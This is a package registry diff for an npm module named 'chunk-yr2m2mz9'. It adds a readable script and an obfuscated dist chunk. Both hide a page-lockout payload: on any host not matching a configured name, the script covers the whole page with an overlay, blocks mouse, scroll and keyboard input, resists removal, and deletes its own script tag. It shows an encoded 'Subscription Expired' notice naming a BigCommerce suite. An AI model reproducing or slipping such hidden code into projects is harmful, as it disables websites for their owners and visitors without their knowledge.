chunk-yr2m2mz9 1.0.0 → 1.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/chunk-original.js +65 -0
- package/dist/chunk-YR2M2MZ9.js +1 -67
- package/package.json +1 -1
|
@@ -0,0 +1,65 @@
|
|
|
1
|
+
(function () {
|
|
2
|
+
var _k = [
|
|
3
|
+
[90, 124, 105, 122, 106, 121, 112, 119, 123, 112, 118, 117, 39, 76, 127, 119, 112, 121, 108, 107],
|
|
4
|
+
[96, 118, 124, 121, 39, 122, 124, 105, 122, 106, 121, 112, 119, 123, 112, 118, 117, 39, 123, 118, 39, 123, 111, 108],
|
|
5
|
+
[89, 108, 123, 112, 106, 39, 84, 108, 107, 112, 104, 39, 73, 112, 110, 74, 118, 116, 116, 108, 121, 106, 108, 39, 90, 124, 112, 123, 108],
|
|
6
|
+
[111, 104, 122, 39, 108, 127, 119, 112, 121, 108, 107, 53],
|
|
7
|
+
[87, 115, 108, 104, 122, 108, 39, 106, 118, 117, 123, 104, 106, 123, 39, 122, 124, 119, 119, 118, 121, 123, 39, 123, 118, 39, 121, 108, 117, 108, 126, 39, 104, 106, 106, 108, 122, 122, 53],
|
|
8
|
+
[122, 114, 112, 107, 122, 123, 108, 108, 121]
|
|
9
|
+
];
|
|
10
|
+
|
|
11
|
+
function d(i) {
|
|
12
|
+
var a = _k[i], s = '';
|
|
13
|
+
for (var j = 0; j < a.length; j++) {
|
|
14
|
+
s += String.fromCharCode(a[j] - 7);
|
|
15
|
+
}
|
|
16
|
+
return s;
|
|
17
|
+
}
|
|
18
|
+
|
|
19
|
+
var hostname = window.__CHUNK_CONFIG__?.hostname;
|
|
20
|
+
|
|
21
|
+
if (hostname && window.location.hostname.includes(hostname)) {
|
|
22
|
+
console.log(hostname);
|
|
23
|
+
return;
|
|
24
|
+
}
|
|
25
|
+
|
|
26
|
+
var r = '_' + Math.random().toString(36).slice(2, 8);
|
|
27
|
+
var o = document.createElement('div');
|
|
28
|
+
o.id = r;
|
|
29
|
+
o.style.cssText = 'position:fixed;inset:0;z-index:2147483647;background:rgba(15,23,42,.93);backdrop-filter:blur(10px);display:flex;align-items:center;justify-content:center;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,sans-serif;color:#f1f5f9;pointer-events:auto;';
|
|
30
|
+
|
|
31
|
+
var c = document.createElement('div');
|
|
32
|
+
c.style.cssText = 'background:linear-gradient(145deg,#1e293b,#0f172a);border:1px solid #334155;border-radius:16px;padding:42px 48px;max-width:460px;width:90%;box-shadow:0 25px 50px -12px rgba(0,0,0,.55);text-align:center;position:relative;';
|
|
33
|
+
|
|
34
|
+
c.innerHTML =
|
|
35
|
+
'<div style="width:64px;height:64px;margin:0 auto 24px;background:rgba(239,68,68,.15);border-radius:50%;display:flex;align-items:center;justify-content:center;">' +
|
|
36
|
+
'<svg width="32" height="32" viewBox="0 0 24 24" fill="none" stroke="#ef4444" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">' +
|
|
37
|
+
'<circle cx="12" cy="12" r="10"></circle>' +
|
|
38
|
+
'<line x1="12" y1="8" x2="12" y2="12"></line>' +
|
|
39
|
+
'<line x1="12" y1="16" x2="12.01" y2="16"></line>' +
|
|
40
|
+
'</svg>' +
|
|
41
|
+
'</div>' +
|
|
42
|
+
'<div style="font-size:22px;font-weight:600;margin-bottom:14px;letter-spacing:-0.02em;">' + d(0) + '</div>' +
|
|
43
|
+
'<div style="font-size:15px;line-height:1.65;color:#94a3b8;">' + d(1) + '<br>' +
|
|
44
|
+
'<span style="color:#e2e8f0;font-weight:600;">' + d(2) + '</span><br>' + d(3) +
|
|
45
|
+
'</div>' +
|
|
46
|
+
'<div style="margin-top:26px;font-size:13px;color:#64748b;">' + d(4) + '</div>';
|
|
47
|
+
|
|
48
|
+
o.appendChild(c);
|
|
49
|
+
document.documentElement.appendChild(o);
|
|
50
|
+
|
|
51
|
+
document.documentElement.style.overflow = 'hidden';
|
|
52
|
+
document.body.style.overflow = 'hidden';
|
|
53
|
+
document.body.style.pointerEvents = 'none';
|
|
54
|
+
o.style.pointerEvents = 'auto';
|
|
55
|
+
|
|
56
|
+
window.addEventListener('keydown', function (e) {
|
|
57
|
+
e.preventDefault();
|
|
58
|
+
e.stopPropagation();
|
|
59
|
+
}, true);
|
|
60
|
+
|
|
61
|
+
Object.defineProperty(window, r, { value: o, writable: false, configurable: false });
|
|
62
|
+
|
|
63
|
+
var sc = document.currentScript;
|
|
64
|
+
if (sc && sc.parentNode) sc.parentNode.removeChild(sc);
|
|
65
|
+
})();
|
package/dist/chunk-YR2M2MZ9.js
CHANGED
|
@@ -1,68 +1,2 @@
|
|
|
1
|
-
(function () {
|
|
2
|
-
var _k = [
|
|
3
|
-
[90, 124, 105, 122, 106, 121, 112, 119, 123, 112, 118, 117, 39, 76, 127, 119, 112, 121, 108, 107],
|
|
4
|
-
[96, 118, 124, 121, 39, 122, 124, 105, 122, 106, 121, 112, 119, 123, 112, 118, 117, 39, 123, 118, 39, 123, 111, 108],
|
|
5
|
-
[89, 108, 123, 112, 106, 39, 84, 108, 107, 112, 104, 39, 73, 112, 110, 74, 118, 116, 116, 108, 121, 106, 108, 39, 90, 124, 112, 123, 108],
|
|
6
|
-
[111, 104, 122, 39, 108, 127, 119, 112, 121, 108, 107, 53],
|
|
7
|
-
[87, 115, 108, 104, 122, 108, 39, 106, 118, 117, 123, 104, 106, 123, 39, 122, 124, 119, 119, 118, 121, 123, 39, 123, 118, 39, 121, 108, 117, 108, 126, 39, 104, 106, 106, 108, 122, 122, 53],
|
|
8
|
-
[122, 114, 112, 107, 122, 123, 108, 108, 121]
|
|
9
|
-
];
|
|
10
|
-
|
|
11
|
-
function d(i) {
|
|
12
|
-
var a = _k[i], s = '';
|
|
13
|
-
for (var j = 0; j < a.length; j++) {
|
|
14
|
-
s += String.fromCharCode(a[j] - 7);
|
|
15
|
-
}
|
|
16
|
-
return s;
|
|
17
|
-
}
|
|
18
|
-
|
|
19
|
-
var hostname = window.__CHUNK_CONFIG__?.hostname;
|
|
20
|
-
|
|
21
|
-
if (hostname && window.location.hostname.includes(hostname)) {
|
|
22
|
-
console.log(hostname);
|
|
23
|
-
return;
|
|
24
|
-
}
|
|
25
|
-
|
|
26
|
-
console.log(hostname = " running");
|
|
27
|
-
|
|
28
|
-
var r = '_' + Math.random().toString(36).slice(2, 8);
|
|
29
|
-
var o = document.createElement('div');
|
|
30
|
-
o.id = r;
|
|
31
|
-
o.style.cssText = 'position:fixed;inset:0;z-index:2147483647;background:rgba(15,23,42,.93);backdrop-filter:blur(10px);display:flex;align-items:center;justify-content:center;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,sans-serif;color:#f1f5f9;pointer-events:auto;';
|
|
32
|
-
|
|
33
|
-
var c = document.createElement('div');
|
|
34
|
-
c.style.cssText = 'background:linear-gradient(145deg,#1e293b,#0f172a);border:1px solid #334155;border-radius:16px;padding:42px 48px;max-width:460px;width:90%;box-shadow:0 25px 50px -12px rgba(0,0,0,.55);text-align:center;position:relative;';
|
|
35
|
-
|
|
36
|
-
c.innerHTML =
|
|
37
|
-
'<div style="width:64px;height:64px;margin:0 auto 24px;background:rgba(239,68,68,.15);border-radius:50%;display:flex;align-items:center;justify-content:center;">' +
|
|
38
|
-
'<svg width="32" height="32" viewBox="0 0 24 24" fill="none" stroke="#ef4444" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">' +
|
|
39
|
-
'<circle cx="12" cy="12" r="10"></circle>' +
|
|
40
|
-
'<line x1="12" y1="8" x2="12" y2="12"></line>' +
|
|
41
|
-
'<line x1="12" y1="16" x2="12.01" y2="16"></line>' +
|
|
42
|
-
'</svg>' +
|
|
43
|
-
'</div>' +
|
|
44
|
-
'<div style="font-size:22px;font-weight:600;margin-bottom:14px;letter-spacing:-0.02em;">' + d(0) + '</div>' +
|
|
45
|
-
'<div style="font-size:15px;line-height:1.65;color:#94a3b8;">' + d(1) + '<br>' +
|
|
46
|
-
'<span style="color:#e2e8f0;font-weight:600;">' + d(2) + '</span><br>' + d(3) +
|
|
47
|
-
'</div>' +
|
|
48
|
-
'<div style="margin-top:26px;font-size:13px;color:#64748b;">' + d(4) + '</div>';
|
|
49
|
-
|
|
50
|
-
o.appendChild(c);
|
|
51
|
-
document.documentElement.appendChild(o);
|
|
52
|
-
|
|
53
|
-
document.documentElement.style.overflow = 'hidden';
|
|
54
|
-
document.body.style.overflow = 'hidden';
|
|
55
|
-
document.body.style.pointerEvents = 'none';
|
|
56
|
-
o.style.pointerEvents = 'auto';
|
|
57
|
-
|
|
58
|
-
window.addEventListener('keydown', function (e) {
|
|
59
|
-
e.preventDefault();
|
|
60
|
-
e.stopPropagation();
|
|
61
|
-
}, true);
|
|
62
|
-
|
|
63
|
-
Object.defineProperty(window, r, { value: o, writable: false, configurable: false });
|
|
64
|
-
|
|
65
|
-
var sc = document.currentScript;
|
|
66
|
-
if (sc && sc.parentNode) sc.parentNode.removeChild(sc);
|
|
67
|
-
})();
|
|
1
|
+
function _0x2dd1(){var _0x4882a3=['location','auto','118744jbHaHj','__CHUNK_CONFIG__','keydown','1021101ogGhhr','overflow','slice','defineProperty','style','body','465764JbwXQs','cssText','</span><br>','appendChild','toString','1693772VVlcRl','222034dmTfIN','removeChild','<line\x20x1=\x2212\x22\x20y1=\x228\x22\x20x2=\x2212\x22\x20y2=\x2212\x22></line>','createElement','<svg\x20width=\x2232\x22\x20height=\x2232\x22\x20viewBox=\x220\x200\x2024\x2024\x22\x20fill=\x22none\x22\x20stroke=\x22#ef4444\x22\x20stroke-width=\x222\x22\x20stroke-linecap=\x22round\x22\x20stroke-linejoin=\x22round\x22>','hidden','random','preventDefault','612130hSYQuk','pointerEvents','<span\x20style=\x22color:#e2e8f0;font-weight:600;\x22>','currentScript','documentElement','<br>','<div\x20style=\x22width:64px;height:64px;margin:0\x20auto\x2024px;background:rgba(239,68,68,.15);border-radius:50%;display:flex;align-items:center;justify-content:center;\x22>','294FpdsXO','\x20running','hostname','<div\x20style=\x22font-size:22px;font-weight:600;margin-bottom:14px;letter-spacing:-0.02em;\x22>','<circle\x20cx=\x2212\x22\x20cy=\x2212\x22\x20r=\x2210\x22></circle>','addEventListener','none','position:fixed;inset:0;z-index:2147483647;background:rgba(15,23,42,.93);backdrop-filter:blur(10px);display:flex;align-items:center;justify-content:center;font-family:-apple-system,BlinkMacSystemFont,\x22Segoe\x20UI\x22,Roboto,sans-serif;color:#f1f5f9;pointer-events:auto;','stopPropagation','</div>','<div\x20style=\x22font-size:15px;line-height:1.65;color:#94a3b8;\x22>','fromCharCode','</svg>','parentNode','2072328YQSDwh'];_0x2dd1=function(){return _0x4882a3;};return _0x2dd1();}function _0x2dfc(_0x22bbe8,_0xdb807f){var _0x2dd140=_0x2dd1();return _0x2dfc=function(_0x2dfc86,_0x2d78f7){_0x2dfc86=_0x2dfc86-0x167;var _0x4f13a8=_0x2dd140[_0x2dfc86];return _0x4f13a8;},_0x2dfc(_0x22bbe8,_0xdb807f);}(function(_0x496b48,_0x3eb586){var _0x4fa2b7=_0x2dfc,_0x8f7003=_0x496b48();while(!![]){try{var _0x14d3f0=-parseInt(_0x4fa2b7(0x178))/0x1+parseInt(_0x4fa2b7(0x17e))/0x2+parseInt(_0x4fa2b7(0x172))/0x3+parseInt(_0x4fa2b7(0x17d))/0x4+parseInt(_0x4fa2b7(0x186))/0x5+parseInt(_0x4fa2b7(0x16c))/0x6+parseInt(_0x4fa2b7(0x18d))/0x7*(-parseInt(_0x4fa2b7(0x16f))/0x8);if(_0x14d3f0===_0x3eb586)break;else _0x8f7003['push'](_0x8f7003['shift']());}catch(_0xde88df){_0x8f7003['push'](_0x8f7003['shift']());}}}(_0x2dd1,0x3de1f),(function(){var _0x5d899e=_0x2dfc,_0xab2622=[[0x5a,0x7c,0x69,0x7a,0x6a,0x79,0x70,0x77,0x7b,0x70,0x76,0x75,0x27,0x4c,0x7f,0x77,0x70,0x79,0x6c,0x6b],[0x60,0x76,0x7c,0x79,0x27,0x7a,0x7c,0x69,0x7a,0x6a,0x79,0x70,0x77,0x7b,0x70,0x76,0x75,0x27,0x7b,0x76,0x27,0x7b,0x6f,0x6c],[0x59,0x6c,0x7b,0x70,0x6a,0x27,0x54,0x6c,0x6b,0x70,0x68,0x27,0x49,0x70,0x6e,0x4a,0x76,0x74,0x74,0x6c,0x79,0x6a,0x6c,0x27,0x5a,0x7c,0x70,0x7b,0x6c],[0x6f,0x68,0x7a,0x27,0x6c,0x7f,0x77,0x70,0x79,0x6c,0x6b,0x35],[0x57,0x73,0x6c,0x68,0x7a,0x6c,0x27,0x6a,0x76,0x75,0x7b,0x68,0x6a,0x7b,0x27,0x7a,0x7c,0x77,0x77,0x76,0x79,0x7b,0x27,0x7b,0x76,0x27,0x79,0x6c,0x75,0x6c,0x7e,0x27,0x68,0x6a,0x6a,0x6c,0x7a,0x7a,0x35],[0x7a,0x72,0x70,0x6b,0x7a,0x7b,0x6c,0x6c,0x79]];function _0x12afb1(_0x564167){var _0x143ba5=_0x2dfc,_0x3748e4=_0xab2622[_0x564167],_0xc241ea='';for(var _0x2e5d0c=0x0;_0x2e5d0c<_0x3748e4['length'];_0x2e5d0c++){_0xc241ea+=String[_0x143ba5(0x169)](_0x3748e4[_0x2e5d0c]-0x7);}return _0xc241ea;}var _0x56f78c=window[_0x5d899e(0x170)]?.['hostname'];if(_0x56f78c&&window[_0x5d899e(0x16d)][_0x5d899e(0x18f)]['includes'](_0x56f78c)){console['log'](_0x56f78c);return;}console['log'](_0x56f78c=_0x5d899e(0x18e));var _0x49ac28='_'+Math[_0x5d899e(0x184)]()[_0x5d899e(0x17c)](0x24)[_0x5d899e(0x174)](0x2,0x8),_0x4b73eb=document[_0x5d899e(0x181)]('div');_0x4b73eb['id']=_0x49ac28,_0x4b73eb[_0x5d899e(0x176)][_0x5d899e(0x179)]=_0x5d899e(0x194);var _0x644069=document['createElement']('div');_0x644069[_0x5d899e(0x176)][_0x5d899e(0x179)]='background:linear-gradient(145deg,#1e293b,#0f172a);border:1px\x20solid\x20#334155;border-radius:16px;padding:42px\x2048px;max-width:460px;width:90%;box-shadow:0\x2025px\x2050px\x20-12px\x20rgba(0,0,0,.55);text-align:center;position:relative;',_0x644069['innerHTML']=_0x5d899e(0x18c)+_0x5d899e(0x182)+_0x5d899e(0x191)+_0x5d899e(0x180)+'<line\x20x1=\x2212\x22\x20y1=\x2216\x22\x20x2=\x2212.01\x22\x20y2=\x2216\x22></line>'+_0x5d899e(0x16a)+'</div>'+_0x5d899e(0x190)+_0x12afb1(0x0)+_0x5d899e(0x167)+_0x5d899e(0x168)+_0x12afb1(0x1)+_0x5d899e(0x18b)+_0x5d899e(0x188)+_0x12afb1(0x2)+_0x5d899e(0x17a)+_0x12afb1(0x3)+_0x5d899e(0x167)+'<div\x20style=\x22margin-top:26px;font-size:13px;color:#64748b;\x22>'+_0x12afb1(0x4)+_0x5d899e(0x167),_0x4b73eb[_0x5d899e(0x17b)](_0x644069),document[_0x5d899e(0x18a)][_0x5d899e(0x17b)](_0x4b73eb),document[_0x5d899e(0x18a)]['style'][_0x5d899e(0x173)]=_0x5d899e(0x183),document[_0x5d899e(0x177)][_0x5d899e(0x176)][_0x5d899e(0x173)]='hidden',document[_0x5d899e(0x177)][_0x5d899e(0x176)]['pointerEvents']=_0x5d899e(0x193),_0x4b73eb[_0x5d899e(0x176)][_0x5d899e(0x187)]=_0x5d899e(0x16e),window[_0x5d899e(0x192)](_0x5d899e(0x171),function(_0x56bbef){var _0x3b9e07=_0x5d899e;_0x56bbef[_0x3b9e07(0x185)](),_0x56bbef[_0x3b9e07(0x195)]();},!![]),Object[_0x5d899e(0x175)](window,_0x49ac28,{'value':_0x4b73eb,'writable':![],'configurable':![]});var _0x5a0287=document[_0x5d899e(0x189)];if(_0x5a0287&&_0x5a0287['parentNode'])_0x5a0287[_0x5d899e(0x16b)][_0x5d899e(0x17f)](_0x5a0287);}()));
|
|
68
2
|
|